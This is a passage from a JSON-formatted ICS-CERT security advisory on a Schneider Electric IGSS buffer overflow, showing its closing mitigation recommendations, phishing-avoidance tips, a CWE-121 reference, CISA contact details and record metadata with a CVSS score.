Networks (VPNs), recognizing that a VPN is only as secure as the connected devices.\n\nICS-CERT provides a section for control systems security recommended practices on the US-CERT Web page. Several recommended practices are available for reading and download, including _Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies_.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01A\u2014Cyber Intrusion Mitigation Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive measures.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nIn addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:\n\n 1. Do not click Web links or open unsolicited attachments in email messages.\n 2. Refer to _Recognizing and Avoiding Email Scams_ for more information on avoiding email scams.\n 3. Refer to _Avoiding Social Engineering and Phishing Attacks_ for more information on social engineering attacks.\n\n[1] CWE-121, http://cwe.mitre.org/data/definitions/121.html, CWE-121: Stack-based Buffer Overflow, Web site last accessed January 18, 2013.\n\n## Contact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n", "edition": 15, "modified": "2013-05-06T00:00:00", "published": "2013-01-17T00:00:00", "id": "ICSA-13-018-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-13-018-01", "title": "Schneider Electric IGSS Buffer Overflow", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}